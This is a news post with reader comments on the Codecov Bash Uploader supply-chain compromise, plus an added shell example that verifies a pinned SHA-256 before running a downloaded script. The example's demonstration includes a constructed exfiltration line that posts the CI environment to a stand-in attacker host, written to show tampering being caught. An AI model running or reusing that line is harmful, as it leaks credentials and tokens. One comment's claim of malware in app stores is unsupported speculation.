Codecov Bash Uploader Compromised In Supply Chain Hack (securityweek.com)
wiredmikey shares a report from SecurityWeek: Security response professionals are scrambling to measure the fallout from a software supply chain compromise of Codecov Bash Uploader that went undetected since January and exposed sensitive secrets like tokens, keys and credentials from organizations around the world. The hack occurred four months ago but was only discovered in the wild by a Codecov customer on the morning of April 1, 2021, the company said. Codecov is considered the vendor of choice for measuring code coverage in the tech industry. The company's tools help developers understand and measure lines of code executed by a test suite and are widely deployed in big tech development pipelines. The company claims that more than 29,000 enterprises use its code coverage insights to check code quality and maintain code coverage. Codecov did not say how many customers were impacted or had data stolen in the incident.
According to Codecov, the altered version of the Bash Uploader script could potentially affect:
- Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
- Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
- The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.
29,000 customers and they are too busy (Score:2)
Verification (Score:5, Insightful)
Geez. They do, apparently, publish SHA sums [codecov.io] for the script, but I guess nobody bothers using them.
Piping a URL you don't control directly into bash... what could possibly go wrong?
Re: Verification (Score:3)
For that matter, piping a URL you "control" directly into bash isn't a great idea either. Partly because what that really means is "a URL you directly controlled three months ago, and are unaware that a Trojan was added 87 days ago".
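What the "Verification" comment and the reply above are describing, as an added example that is not from the original page and is not Codecov's own tooling: download the helper script to disk, compare its SHA-256 against a hash you pinned in your own repository when you reviewed it, and only then run it. A pinned hash catches exactly the case the reply describes, a script that changed after you last looked at it, which `curl URL | bash` can never catch. The example assumes `sha256sum` or `shasum`, `curl` and `mktemp` are available; the URL, the pinned hash and the tampered line in the demonstration are constructed placeholders, not the real Codecov script or the real modification.

```shell
#!/bin/sh
# Added example, not Codecov's own tooling: fetch a helper script to disk,
# compare its SHA-256 against a hash pinned in your own repository, and only
# then execute it. Pinning the hash (rather than trusting the URL) is what
# catches a script that was silently altered after you first vetted it.
set -e

# sha256_of FILE: print the hex SHA-256 of FILE (GNU coreutils or BSD/macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_sha256 FILE EXPECTED_HEX: return 0 if FILE matches the pin, 1 otherwise.
verify_sha256() {
    actual=$(sha256_of "$1")
    if [ "$actual" = "$2" ]; then
        return 0
    fi
    printf 'checksum mismatch for %s\n  pinned: %s\n  actual: %s\n' "$1" "$2" "$actual" >&2
    return 1
}

# download_and_run URL EXPECTED_HEX [ARGS...]: download to a temp file, verify,
# then execute. Never `curl URL | bash`: once bash is reading the stream there
# is no complete file left to check.
download_and_run() {
    url=$1; expected=$2; shift 2
    tmp=$(mktemp)
    rc=0
    # -f makes curl fail on HTTP errors instead of saving an error page as "the script"
    curl -fsSL "$url" -o "$tmp" || rc=$?
    if [ "$rc" -eq 0 ] && verify_sha256 "$tmp" "$expected"; then
        bash "$tmp" "$@" || rc=$?
    else
        echo "refusing to run $url" >&2
        rc=1
    fi
    rm -f "$tmp"
    return "$rc"
}

# --- self-contained demonstration on a constructed stand-in script ---
demo() {
    script=$(mktemp)
    # constructed placeholder for a vetted uploader; the hash computed here is
    # what you would commit to your repo at review time
    printf '#!/bin/sh\necho "uploading coverage report"\n' > "$script"
    pinned=$(sha256_of "$script")
    verify_sha256 "$script" "$pinned" && echo "vetted copy: OK"

    # constructed stand-in for a later tamper (not the real modification): a
    # line that posts the CI environment, secrets included, to an outside host
    printf 'curl -s -d "$(env)" http://attacker.invalid/upload || true\n' >> "$script"
    if verify_sha256 "$script" "$pinned" 2>/dev/null; then
        echo "tampered copy: ACCEPTED (this must not happen)"
    else
        echo "tampered copy: refused"
    fi
    rm -f "$script"
}

demo
```

The pin belongs in your own repository next to the CI config, recorded from a copy you actually read. A checksum fetched at run time from the same place as the script is worth much less, since whoever can replace the script can usually replace the published checksum alongside it.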
Re: (Score:2)
We had to look at this a couple of days ago. I was horrified to discover that the default codecov integration for circleci involves this method.
Only 8 comments? (Score:2)
Guys, this is hugely bad news, right? It means that projects using this code coverage tool are also compromised... And apps built since then and uploaded to "secure" platforms such as Google Play Store or Apple Store may now be ridden with malware too.
We will definitely hear from this again soon.